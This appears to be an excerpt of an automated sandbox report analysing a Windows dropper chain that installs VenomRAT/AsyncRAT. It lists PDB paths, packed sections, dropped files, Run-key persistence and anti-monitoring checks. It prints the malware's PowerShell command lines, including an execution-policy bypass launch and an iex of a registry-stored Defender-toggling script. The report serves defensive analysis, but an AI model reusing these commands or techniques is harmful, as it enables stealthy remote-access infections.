Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb089C< source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Stub\ClientAny.pdb source: ClientAny.exe, 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp, ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp, ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: H3tyh96.exe, 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.3115713877.00000000061B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbs source: powershell.exe, 00000028.00000002.3172591010.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indoC:\Windows\ClientAny.pdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdby= source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: [symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdb7= source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\ClientAny.pdbdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: ClientAny.PDBF source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb8= source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: H3tyh96.exe, 00000007.00000002.3711157694.0000000009100000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: @o.pdb source: RegSvcs.exe, 00000009.00000002.3296593563.00000000005B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendFile.pdb source: H3tyh96.exe, 00000007.00000002.3710972877.0000000009050000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: H3tyh96.exe, 00000007.00000002.3712425551.0000000009340000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Windows\ClientAny.pdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdbx source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005256000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005EFF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3715237584.000000000A840000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: H3tyh96.exe, 00000007.00000002.3709759670.0000000008BB0000.00000004.10000000.00040000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.00000000060A5000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: $]q costura.dotnetzip.pdb.compressed source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F50000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbe=neutra source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\ClientAny.pdb source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.3304967833.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Stub\ClientAny.pdbi'9q source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbn source: RegSvcs.exe, 00000009.00000002.3301762654.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\ClientAny.pdbont source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $]q%costura.messagepacklib.pdb.compressed source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F50000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: pC:\Users\user\AppData\Local\Temp\ClientAny.PDB source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\ClientAny.pdberseFIqn! source: ClientAny.exe, 00000016.00000002.3298173734.0000000000E59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\ClientAny.pdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Extra.pdb source: H3tyh96.exe, 00000007.00000002.3712560611.0000000009360000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users.pdb source: ClientAny.exe, 00000016.00000002.3298079923.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.380000.0.unpack :EW;.rsrc:W;.idata :W;lstatpgb:EW;iqsxvwjg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lstatpgb:EW;iqsxvwjg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.280000.0.unpack :EW;.rsrc:W;.idata :W;lstatpgb:EW;iqsxvwjg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lstatpgb:EW;iqsxvwjg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.280000.0.unpack :EW;.rsrc:W;.idata :W;lstatpgb:EW;iqsxvwjg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lstatpgb:EW;iqsxvwjg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.280000.0.unpack :EW;.rsrc:W;.idata :W;lstatpgb:EW;iqsxvwjg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lstatpgb:EW;iqsxvwjg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Unpacked PE file: 7.2.H3tyh96.exe.3b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kzyimikk:EW;vgdirfva:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Unpacked PE file: 8.2.75f24a4b40.exe.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zroyxpcd:EW;chhltftk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zroyxpcd:EW;chhltftk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Unpacked PE file: 27.2.9e4b3ff3c2.exe.750000.0.unpack :EW;.rsrc:W;.idata :W; :EW;razuzqfw:EW;rexqpveb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;razuzqfw:EW;rexqpveb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Unpacked PE file: 48.2.75f24a4b40.exe.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zroyxpcd:EW;chhltftk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zroyxpcd:EW;chhltftk:EW;.taggant:EW;

.NET source code contains potential unpacker

Source: ClientAny.exe.7.dr, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 7.2.H3tyh96.exe.5fefe10.5.raw.unpack, DynamicUtils.cs	.Net Code: CreateSharpArgumentInfoArray
Source: 7.2.H3tyh96.exe.5fefe10.5.raw.unpack, LateBoundReflectionDelegateFactory.cs	.Net Code: CreateDefaultConstructor

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0x1ccba9 should be: 0x1d0b58
Source: f2da6a22b2.exe.6.dr	Static PE information: real checksum: 0x1e5b86 should be: 0x1e0ffa
Source: ClientAny.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x13d30
Source: random[1].exe2.6.dr	Static PE information: real checksum: 0x2bfa54 should be: 0x2c25cd
Source: H3tyh96[1].exe.6.dr	Static PE information: real checksum: 0x1b9925 should be: 0x1b0a3c
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: real checksum: 0x1bd907 should be: 0x1bf333
Source: H3tyh96.exe.6.dr	Static PE information: real checksum: 0x1b9925 should be: 0x1b0a3c
Source: file.exe	Static PE information: real checksum: 0x320c5f should be: 0x3185c5
Source: 75f24a4b40.exe.6.dr	Static PE information: real checksum: 0x1ccba9 should be: 0x1d0b58
Source: 2fdabbc809.exe.6.dr	Static PE information: real checksum: 0x2bfa54 should be: 0x2c25cd
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x320c5f should be: 0x3185c5
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x1bd907 should be: 0x1bf333
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x1e5b86 should be: 0x1e0ffa

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: lstatpgb
Source: file.exe	Static PE information: section name: iqsxvwjg
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: lstatpgb
Source: skotes.exe.0.dr	Static PE information: section name: iqsxvwjg
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: H3tyh96[1].exe.6.dr	Static PE information: section name:
Source: H3tyh96[1].exe.6.dr	Static PE information: section name: .idata
Source: H3tyh96[1].exe.6.dr	Static PE information: section name:
Source: H3tyh96[1].exe.6.dr	Static PE information: section name: kzyimikk
Source: H3tyh96[1].exe.6.dr	Static PE information: section name: vgdirfva
Source: H3tyh96[1].exe.6.dr	Static PE information: section name: .taggant
Source: H3tyh96.exe.6.dr	Static PE information: section name:
Source: H3tyh96.exe.6.dr	Static PE information: section name: .idata
Source: H3tyh96.exe.6.dr	Static PE information: section name:
Source: H3tyh96.exe.6.dr	Static PE information: section name: kzyimikk
Source: H3tyh96.exe.6.dr	Static PE information: section name: vgdirfva
Source: H3tyh96.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: zroyxpcd
Source: random[1].exe.6.dr	Static PE information: section name: chhltftk
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 75f24a4b40.exe.6.dr	Static PE information: section name:
Source: 75f24a4b40.exe.6.dr	Static PE information: section name: .idata
Source: 75f24a4b40.exe.6.dr	Static PE information: section name:
Source: 75f24a4b40.exe.6.dr	Static PE information: section name: zroyxpcd
Source: 75f24a4b40.exe.6.dr	Static PE information: section name: chhltftk
Source: 75f24a4b40.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: razuzqfw
Source: random[1].exe0.6.dr	Static PE information: section name: rexqpveb
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name:
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name: .idata
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name:
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name: razuzqfw
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name: rexqpveb
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: random[1].exe2.6.dr	Static PE information: section name: fdostlpk
Source: random[1].exe2.6.dr	Static PE information: section name: xuupeoyq
Source: random[1].exe2.6.dr	Static PE information: section name: .taggant
Source: 2fdabbc809.exe.6.dr	Static PE information: section name:
Source: 2fdabbc809.exe.6.dr	Static PE information: section name: .idata
Source: 2fdabbc809.exe.6.dr	Static PE information: section name: fdostlpk
Source: 2fdabbc809.exe.6.dr	Static PE information: section name: xuupeoyq
Source: 2fdabbc809.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: wdmfkhwd
Source: random[2].exe.6.dr	Static PE information: section name: dxdebgre
Source: random[2].exe.6.dr	Static PE information: section name: .taggant
Source: f2da6a22b2.exe.6.dr	Static PE information: section name:
Source: f2da6a22b2.exe.6.dr	Static PE information: section name: .idata
Source: f2da6a22b2.exe.6.dr	Static PE information: section name:
Source: f2da6a22b2.exe.6.dr	Static PE information: section name: wdmfkhwd
Source: f2da6a22b2.exe.6.dr	Static PE information: section name: dxdebgre
Source: f2da6a22b2.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0039D91C push ecx; ret	0_2_0039D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00391359 push es; ret	0_2_0039135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0029D91C push ecx; ret	2_2_0029D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0029D91C push ecx; ret	3_2_0029D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0029D91C push ecx; ret	6_2_0029D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0029DFC6 push ecx; ret	6_2_0029DFD9
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0802E000 push FFFFFF8Bh; iretd	7_2_0802E008
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0802E39F push dword ptr [esp+ecx*2-75h]; ret	7_2_0802E3A3
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0912FF0A push esp; iretd	7_2_0912FF11
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091A2030 push esp; ret	7_2_091A2031
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_091BA068 pushfd ; ret	7_2_091BA071
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_0920C5DE push ss; ret	7_2_0920C5DF
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Code function: 7_2_09248278 pushad ; iretd	7_2_092482B1

Source: file.exe	Static PE information: section name: entropy: 7.07067899926297
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.07067899926297
Source: H3tyh96[1].exe.6.dr	Static PE information: section name: entropy: 7.944219044580318
Source: H3tyh96[1].exe.6.dr	Static PE information: section name: kzyimikk entropy: 7.9541750321291556
Source: H3tyh96.exe.6.dr	Static PE information: section name: entropy: 7.944219044580318
Source: H3tyh96.exe.6.dr	Static PE information: section name: kzyimikk entropy: 7.9541750321291556
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.976342147298525
Source: random[1].exe.6.dr	Static PE information: section name: zroyxpcd entropy: 7.953207505927057
Source: 75f24a4b40.exe.6.dr	Static PE information: section name: entropy: 7.976342147298525
Source: 75f24a4b40.exe.6.dr	Static PE information: section name: zroyxpcd entropy: 7.953207505927057
Source: random[1].exe0.6.dr	Static PE information: section name: razuzqfw entropy: 7.954122734362041
Source: 9e4b3ff3c2.exe.6.dr	Static PE information: section name: razuzqfw entropy: 7.954122734362041
Source: random[1].exe2.6.dr	Static PE information: section name: entropy: 7.7896036968851226
Source: 2fdabbc809.exe.6.dr	Static PE information: section name: entropy: 7.7896036968851226
Source: random[2].exe.6.dr	Static PE information: section name: wdmfkhwd entropy: 7.943469746067527
Source: f2da6a22b2.exe.6.dr	Static PE information: section name: wdmfkhwd entropy: 7.943469746067527

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\H3tyh96[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013679001\2fdabbc809.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File created: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013680001\f2da6a22b2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.H3tyh96.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: 22.0.ClientAny.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ClientAny.exe PID: 7160, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ClientAny.exe, type: DROPPED

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2fdabbc809.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 75f24a4b40.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae44c30d83.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9e4b3ff3c2.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
